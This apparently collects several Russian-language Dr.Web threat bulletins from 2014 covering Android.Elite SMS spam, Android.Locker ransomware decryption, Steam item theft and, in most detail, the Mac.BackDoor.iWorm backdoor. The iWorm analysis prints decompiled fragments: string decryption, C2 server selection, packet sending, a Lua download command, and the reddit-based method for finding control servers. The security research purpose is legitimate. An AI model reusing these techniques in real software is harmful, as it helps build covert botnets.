Помимо форматирования SD-карты и частичной блокировки средств коммуникации, Android.Elite.1.origin с периодичностью в 5 секунд рассылает по всем найденным в телефонной книге контактам СМС со следующим текстом:

HEY!!! [имя контакта] Elite has hacked you.Obey or be hacked.

Кроме того, похожий текст отправляется в ответ на все входящие СМС, поступившие с действующих мобильных номеров других пользователей:

Elite has hacked you.Obey or be hacked.

Таким образом, счет мобильного телефона большинства пострадавших владельцев зараженных мобильных устройств может быть опустошен за считанные минуты и даже секунды.

Специалисты компании «Доктор Веб» не рекомендуют пользователям загружать приложения из сомнительных источников. Предоставлять доступ подобным приложениям к правам администратора мобильного устройства также не рекомендуется во избежание порчи файлов или иных негативных последствий. Запись для детектирования троянца Android.Elite.1.origin внесена в вирусную базу, поэтому пользователи антивируса Dr.Web для Android и Dr.Web для Android Light надежно защищены от его атак.

Защитите ваше Android-устройство с помощью Dr.Web

http://feedproxy.google.com/~r/drweb/viruses/~3/USGd_opLudE/

29 сентября 2014 года

Специалисты компании «Доктор Веб» исследовали сложную троянскую программу Mac.BackDoor.iWorm, угрожающую компьютерам, работающим под управлением операционной системы Mac OS X. По данным на 29 сентября 2014 года в бот-сети, созданной злоумышленниками с использованием этого троянца, насчитывалось 18 519 уникальных IP-адресов инфицированных компьютеров.

Бэкдор распаковывается в папку /Library/Application Support/JavaW. С помощью специально сформированного файла plist он устанавливается в автозагрузку через /Library/LaunchDaemons/ под видом приложения com.JavaW.

В процессе своей работы Mac.BackDoor.iWorm активно использует криптографию. После запуска троянец инициализирует контекст (который будет использован далее для криптографии) и по нулевому смещению записывает два байта, которые являются ключом для последующей дешифровки строк. Строки дешифруются с использованием следующего алгоритма:

void DecryptStrings(unsigned __int8* Data, size_t size)
{
    for(int i = 0; i < size; i++)
    {
        if (Data[i])
        {
            Data[i] -= 'Z';
            Data[i] ^= 'M';
        }
    }
}

Затем троянец пытается получить содержимое директории /Library: в случае успеха он перебирает все вложенные папки и считает для их имен значения MD5. Полученные значения MD5 нужны для обнаружения установленного ПО, с которыми бэкдор не будет в дальнейшем взаимодействовать. Обнаружение происходит следующим образом:

find_banned_dir:
  challenge[5] = 0;
  challenge[4] = 0;
  challenge[0] = 0x67452301;
  challenge[1] = 0xEFCDAB89;
  challenge[2] = 0x98BADCFE;
  challenge[3] = 0x10325476;
  szDir = (const char *)&dir-&qt;d_seekoff;
  szDir_len = strlen(szDir);
  MD5_Update(szDir, challenge, szDir_len);
  MD5_Final((char *)&MD5OfDir, challenge);
  z = 0;
  do
  {
    if ( z &qt; 2 )
    {
      dir = readdir(hLib);
      if ( !dir )
        goto banned_dir_not_found;
      goto find_banned_dir;
    }
    BannedFoldersMD5 = pBannedFoldersMD5[z++];
  }
  while ( MD5OfDir != _byteswap_ulong(BannedFoldersMD5) );

Если «нежелательные» директории обнаружить не удается, бот последовательно вызывает функции getuid и gepwuid для получения имени папки пользователя, под учетной записью которого он был запущен, и проверяет наличие в ней конфигурационного файла %pw_dir%/.JavaW, который создается при первом запуске бэкдора. Также при первом запуске генерируется номер порта (при последующих запусках троянец получает порт из конфигурационного файла):

r1 = TwisterGenRnd();;  //получение случайного числа
r2 = 0xFFFF0400 * (random_value / 0xFC00);
port = (WORD)(r1 + r2 + 1024);

Затем из полученного значения порта формируется структура backdoor_param, которая после шифрования будет записана в конфигурационный файл. Каждая запись в конфигурационном файле имеет следующий вид:

struct backdoor_param
{
    char szParam[];
    char szValue[];
};

Сформированная из значений %param_name% и %param_value% структура шифруется с использованием алгоритма AES-256. Зашифрованная структура записывается в конфигурационный файл. Далее бэкдор запускает три потока со следующим функциональным назначением:

• открывает порт и ждет входящего соединения;
• делает запрос к сайту и получает адреса управляющих серверов;
• устанавливает соединение с управляющими серверами и получает от них команды.

Для получения адресов управляющих серверов Mac.BackDoor.iWorm определяет текущую дату и вычисляет ее значение в днях по формуле:

time_t timee;
struct tm *tm;
 
time(&timee);
tm = gmtime(&timee);
dwDays = tm->tm_yday + 365 * tm->tm_year;

От полученного значения троянец вычисляет хэш-функцию MD5 и отправляет на сайт reddit.com поисковый запрос следующего вида:

https://www.reddit.com/search?q=

где MD5_hash_first8 — значения первых 8 байт хэш-функции MD5 от текущей даты. По результатам поиска reddit.com отдает веб-страницу со списком управляющих серверов ботнета и портов, которые злоумышленники публикуют в виде комментариев к теме minecraftserverlists от имени пользователя vtnhiaovyd. Получение списка управляющих адресов повторяется с интервалом в 5 минут.

Для своей дальнейшей работы троянец выбирает управляющий сервер по следующему алгоритму:

rnd = TwisterGenRnd(); //получение случайного числа
szIP = GetAddressByIndex(pCSrvList, rnd % (pSrvList_size >> 2) % (pSrvList_size >> 2));

Фактически, бот пытается установить соединение с командными серверами, перебирая в случайном порядке первые 29 адресов из полученного списка и отправляя запросы на каждый из них. После установки соединения Mac.BackDoor.iWorm проверяет, не находится ли данный сайт в списке исключений:

i = 0;
while ( 1 )
{
  pthread_mutex_lock(&pMutex_0);
  BanListSize = (pBanListEnd - pBanListBeg) >> 2;
  pthread_mutex_unlock(&pMutex_0);
  if ( i >= BanListSize )
    break;
  pszBannedIP = GetAddressByIndex(pCBanList, i++);
  if ( CompareAddresses(pszBannedIP, szIP) ) 
  {
    pthread_mutex_unlock(&pMutex_0);
    shutdown(this->socket, SHUT_WR);
    goto func_exit;
  }
}

Установив соединение с управляющим сервером, бэкдор обменивается с ним специальным набором данных, по которым с использованием ряда сложных математических преобразований проверяется подлинность удаленного узла. Если проверка прошла успешно, бот отправляет на удаленный сервер номер открытого на инфицированном компьютере порта и свой уникальный идентификатор, ожидая в ответ поступления управляющих команд. Отправляемые данные шифруются по алгоритму AES-256 и передаются пакетами следующим способом:

void SendPacket(char packet_signature, struct st_node *pNode, unsigned __int16 packet_size, char *pPacketData)
{
    WORD ps = 0;
    SendData(&packet_signature, pNode->pCSocket, 1u);
    ps = BYTE(packet_size) << 8;
    SendData((char *)&ps, pNode_->pCSocket, 2u);
    SendData(pPacketData, pNode_->pCSocket, packet_size);
}

Для обработки поступающих от управляющего сервера команд в бэкдоре реализована поддержка Lua. В зависимости от типа полученных данных бот может выполнять либо отдельные команды, либо Lua-скрипты. Пример такого Lua-скрипта представлен ниже:

if platform() == "OSX" and get("d") ~= "3" then
httpgeted("https://*****.files.wordpress.com/2014/08/01.jpg")
set("d", "3");

Набор базовых команд бэкдора для Lua-скриптов позволяет выполнять следующие операции:

• получение типа ОС;
• получение версии бота;
• получение UID бота;
• получение значения параметра из конфигурационного файла;
• установка значения параметра в конфигурационном файле;
• очистка конфигурационных данных от всех параметров;
• получение времени работы бота (uptime);
• отправка GET-запроса;
• скачивание файла;
• открытие сокета для входящего соединения с последующим выполнением приходящих команд;
• выполнение системной команды;
• выполнение паузы (sleep);
• добавление нода по IP в список «забаненных» узлов;
• очистка списка «забаненных» нодов;
• получение списка нодов;
• получение IP-адреса нода;
• получение типа нода;
• получение порта нода;
• выполнение вложенного Lua-скрипта.

На текущий момент можно говорить о наличии следующих функций (не считая функционал Lua-скриптов):

• отправка UID;
• отправка номера открытого порта;
• добавление в свой список нодов новых ботов (как подключившихся, так и пришедших в команде);
• ретрансляция трафика (принимаемые данные по одному сокету без изменений передаются на другой);
• подключение к хосту, указанному в пришедшей команде;
• выполнение Lua-скриптов.

Новость об угрозе

http://feedproxy.google.com/~r/drweb/viruses/~3/y_H73XIm7rA/

29 сентября 2014 года

В сентябре 2014 года вирусные аналитики компании «Доктор Веб» исследовали сразу несколько новых угроз для операционной системы Apple Mac OS X. Одна из них — это сложный многофункциональный бэкдор, добавленный в вирусные базы под именем Mac.BackDoor.iWorm. Данная программа позволяет выполнять на инфицированном «маке» широкий набор различных команд, поступивших от злоумышленников. Полученные в результате статистического анализа данные свидетельствуют о наличии более 17 000 уникальных IP-адресов инфицированных троянцем «маков».

При создании данной вредоносной программы злоумышленники использовали языки программирования С++ и Lua, при этом в архитектуре бэкдора широко применяется криптография. В процессе установки троянец распаковывается в папку /Library/Application Support/JavaW, после чего дроппер собирает «на лету» файл plist для обеспечения автоматического запуска этой вредоносной программы.

В момент первого запуска Mac.BackDoor.iWorm сохраняет свои конфигурационные данные в отдельном файле и пытается прочитать содержимое папки /Library, чтобы получить список установленных в системе приложений, с которыми бэкдор не будет в дальнейшем взаимодействовать. Если «нежелательные» директории обнаружить не удается, бот получает с использованием нескольких системных функций наименование домашней папки пользователя Mac OS Х, от имени которого он был запущен, проверяет наличие в ней своего конфигурационного файла и записывает туда данные, необходимые ему для дальнейшей работы. Затем Mac.BackDoor.iWorm открывает на инфицированном компьютере один из портов и ожидает входящего соединения, отправляет запрос на удаленный интернет-ресурс для получения списка адресов управляющих серверов, после чего подключается к удаленным серверам и ожидает поступления команд для последующего выполнения. Примечательно, что за списком адресов управляющих серверов бот обращается к поисковому сервису сайта reddit.com, указывая в качестве запроса шестнадцатеричные значения первых 8 байт хэш-функции MD5 от текущей даты. По результатам поиска reddit.com отдает веб-страницу со списком управляющих серверов ботнета и портов, которые злоумышленники публикуют в виде комментариев к теме minecraftserverlists от имени пользователя vtnhiaovyd:

Троянец пытается установить соединение с командными серверами, перебирая в случайном порядке первые 29 адресов из полученного списка и отправляя запросы на каждый из них. Повторные запросы к сайту reddit для получения нового перечня отправляются раз в 5 минут.

В процессе установки соединения с управляющим сервером, адрес которого выбирается из списка по специальному алгоритму, троянец пытается определить, не добавлен ли этот адрес в список исключений, и обменивается с ним специальным набором данных, по которым с использованием ряда сложных математических преобразований проверяется подлинность удаленного узла. Если проверка прошла успешно, бот отправляет на удаленный сервер номер открытого на инфицированном компьютере порта и свой уникальный идентификатор, ожидая в ответ поступления управляющих команд.

Mac.BackDoor.iWorm способен выполнять два типа команд: различные директивы в зависимости от поступивших бинарных данных или Lua-скрипты. Набор базовых команд бэкдора для Lua-скриптов позволяет выполнять следующие операции:

• получение типа ОС;
• получение версии бота;
• получение UID бота;
• получение значения параметра из конфигурационного файла;
• установка значения параметра в конфигурационном файле;
• очистка конфигурационных данных от всех параметров;
• получение времени работы бота (uptime);
• отправка GET-запроса;
• скачивание файла;
• открытие сокета для входящего соединения с последующим выполнением приходящих команд;
• выполнение системной команды;
• выполнение паузы (sleep);
• добавление нода по IP в список «забаненных» узлов;
• очистка списка «забаненных» нодов;
• получение списка нодов;
• получение IP-адреса нода;
• получение типа нода;
• получение порта нода;
• выполнение вложенного Lua-скрипта.

Собранная специалистами компании «Доктор Веб» статистика показывает, что в бот-сети, созданной злоумышленниками с использованием Mac.BackDoor.iWorm, на 26 сентября 2014 года насчитывалось 17 658 IP-адресов зараженных устройств. Наибольшее их количество — 4610 (что составляет 26.1% от общего числа) приходится на долю США, на втором месте — Канада с показателем 1235 адресов (7 %), третье место занимает Великобритания: здесь выявлено 1227 IP-адресов инфицированных компьютеров, что составляет 6.9% от их общего числа. Географическое распределение бот-сети Mac.BackDoor.iWorm по состоянию на конец сентября 2014 года показано на следующей иллюстрации:

Запись для данной вредоносной программы добавлена в вирусные базы, поэтому Mac.BackDoor.iWorm не представляет опасности для пользователей Apple-совместимых компьютеров, на которых установлен Антивирус Dr.Web для Mac OS X.

Подробнее об угрозе

http://feedproxy.google.com/~r/drweb/viruses/~3/797faoTFkNo/

24 сентября 2014 года

Компания «Доктор Веб» сообщает о том, что разработана бесплатная для пользователей утилита Dr.Web, которая предназначена для расшифровки файлов, пострадавших от действия троянца-вымогателя Android.Locker.2.origin. Попадая на Android-смартфон или планшет, этот троянец зашифровывает сохраненные на карте памяти фотографии, документы, видео и прочие данные, блокирует мобильное устройство и требует у пользователей выкуп за восстановление его работоспособности. Пользователи продукта комплексной защиты Dr.Web для Android теперь имеют возможность избежать этой угрозы, обратившись за утилитой в службу технической поддержки «Доктор Веб».

Появившийся в мае текущего года троянец-вымогатель Android.Locker.2.origin представляет чрезвычайную опасность для пользователей. После своего запуска он находит хранящиеся на сменной карте Android-смартфона или планшета файлы с расширениями .jpeg, .jpg, .png, .bmp, .gif, .pdf, .doc, .docx, .txt, .avi, .mkv, .3gp, после чего шифрует их, добавляя к каждому файлу расширение .enc. Затем экран мобильного устройства блокируется, и на нем демонстрируется сообщение с обвинением в распространении порнографических материалов, а также требованием заплатить выкуп за разблокировку устройства. При этом, чтобы усилить психологическое давление на свою жертву, вымогатель может добавить к данному сообщению фотографию пользователя, сделанную фронтальной камерой мобильного устройства.

Подробно изучив данную угрозу, специалисты компании «Доктор Веб» разработали специальную утилиту, которая с высокой долей вероятности поможет восстановить поврежденные троянцем файлы, избавив пострадавших пользователей от необходимости выплачивать злоумышленникам выкуп.

При запуске утилита сканирует подключенную SD-карту и выполняет на ней поиск зашифрованных файлов, после чего происходит пробная попытка восстановления одного из них. В случае успешной расшифровки тестового изображения программа переходит непосредственно к основному процессу восстановления найденных ранее файлов. Для этого на карте памяти создается каталог DrWebTemp, в который перед расшифровкой помещаются резервные копии всех зашифрованных файловых объектов. Успешно восстановленные файлы размещаются по месту их оригинального расположения, но уже без добавочного расширения .enc. При этом, чтобы исключить безвозвратную потерю данных после окончания работы утилиты, каталог DrWebTemp, содержащий копии зашифрованных файлов, сохраняется.

Если вы стали жертвой троянца Android.Locker.2.origin, выполните следующие действия:

• не пытайтесь восстановить зашифрованные файлы самостоятельно;
• обратитесь в службу технической поддержки компании «Доктор Веб», создав запрос в категории «Запрос на лечение» (эта услуга бесплатна);
• к запросу приложите зашифрованный троянцем файл;
• дождитесь ответа вирусного аналитика.

Напоминаем, что услуги по расшифровке файлов оказываются только обладателям коммерческих лицензий на антивирусные продукты производства компании «Доктор Веб». Для получения утилиты необходимо владеть коммерческой лицензией Dr.Web для Android, Dr.Web Security Space или Антивирус Dr.Web, включающей услуги технической поддержки.

Чтобы обеспечить постоянную защиту вашего мобильного устройства от действий троянца Android.Locker.2.origin и других Android-угроз, приобретите полную версию Dr.Web для Android с расширенным функционалом.

Защитите ваше Android-устройство с помощью Dr.Web

http://feedproxy.google.com/~r/drweb/viruses/~3/DRW7sQHRtHs/

11 сентября 2014 года

Ни для кого не секрет, что современная индустрия компьютерных игр представляет собой высокоразвитый рынок c ежегодным оборотом в десятки миллиардов долларов. Некоторые многопользовательские игры — это детально продуманные «виртуальные миры», обитателями которых становятся игроки из разных уголков земного шара. Подобные игровые вселенные нередко могут похвастаться собственной экономической системой, в рамках которой можно покупать, реализовывать и обменивать различные игровые предметы, порой — за реальные деньги. Специалисты компании «Доктор Веб» обнаружили вредоносную программу, способную красть такие артефакты у пользователей игровой платформы Steam.

Игровая платформа Steam, представляющая собой популярный сервис распространения компьютерных игр, принадлежит компании Valve и позволяет пользователям загружать из Интернета игровые приложения, активировать их, получать обновления и знакомиться с различными новостями игрового мира. Помимо собственных игр Valve, с помощью Steam осуществляется дистрибуция игровых продуктов других разработчиков. Многие из опубликованных в Steam игр допускают использование различных виртуальных предметов, меняющих внешний вид персонажа, либо дающих игроку те или иные преимущества. Некоторые из таких предметов можно продать или купить за реальные деньги с использованием специального сервиса, предлагаемого платформой Steam.

В конце августа 2014 года на различных игровых форумах начали появляться сообщения пользователей платформы Steam о том, что у них стали неожиданно пропадать ценные игровые предметы и ресурсы. Виновником «виртуальных краж» оказался троянец, добавленный в вирусные базы Dr.Web под именем Trojan.SteamBurglar.1. Данная вредоносная программа распространялась злоумышленниками путем рассылки сообщений в чате Steam или на специализированных форумах с предложением посмотреть скриншоты виртуального оружия или иных ресурсов, представленных якобы для продажи или обмена, наподобие следующего: "Hello. I like your weapon. Can you swap for my knife + weapon? (Look screenshot my knife + weapon)". Эти картинки Trojan.SteamBurglar.1 демонстрировал пользователю атакованного компьютера. В то же время сам троянец отыскивал в памяти процесс steam.exe, извлекал из него информацию об игровых предметах, выявлял среди них наиболее ценные по ключевым словам rare, immortal, legendary, и т. д., после чего осуществлял их кражу с целью последующей продажи. Украденные артефакты пересылаются на одну из принадлежащих злоумышленникам учетных записей:

Сигнатуры Trojan.SteamBurglar.1 добавлены в вирусные базы, поэтому данная вредоносная программа не представляет угрозы для пользователей Steam, компьютеры которых защищены антивирусным ПО производства компании «Доктор Веб». Вместе с тем игрокам, желающим продать или купить какой-либо игровой предмет, рекомендуется относиться с осторожностью к предложениями о совершении сделок, поступающим от незнакомых отправителей, — даже если речь идет всего лишь о приобретении волшебного заколдованного меча за несколько десятков вполне настоящих долларов.

http://feedproxy.google.com/~r/drweb/viruses/~3/CDtyiKQJGcM/